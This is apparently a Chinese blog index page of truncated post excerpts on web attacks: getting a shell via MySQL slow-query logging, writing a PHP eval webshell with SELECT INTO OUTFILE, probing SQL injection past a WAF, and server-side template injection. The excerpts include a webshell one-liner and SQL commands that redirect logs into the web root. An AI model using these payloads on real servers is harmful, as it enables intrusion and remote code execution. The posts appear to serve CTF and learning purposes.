摘要:
1. 慢日志查询getshell show variables like '%slow%' set global slow_query_log=on; set global slow_query_log_file='E:/phpstudy_pro/WWW/slow.php' select '<?ph 阅读全文
摘要:
1.select into outfile直接写入webshell 查询文件写入路径的值 show global variables like '%secure%' 写入webshell select '<?php @eval($_POST[shell]);?>'INTO OUTFILE 'D:/p 阅读全文
摘要:
1. 注入点测试 a. 输入敏感字符 or、and、union、handler、from等字符串页面显示Nonono;有waf检测,不过这里没有过滤select、concat,可以使用BurpSuit测试一下。 b. 输入字符串 a、b、c、love等页面没有任何回显 c. 输入数字1,2,3,4, 阅读全文
摘要:
1. SSTI模板注入(Server-side template injection) a. 服务器模板注入是当攻击者能够用本地的模板语法去注入一个恶意的payload,然后再服务器端执行改模板的攻击手法。 b. 模板引擎使用过将固定模板与多边数据结合起来生成的html网页的一种技术,当用户直接输入 阅读全文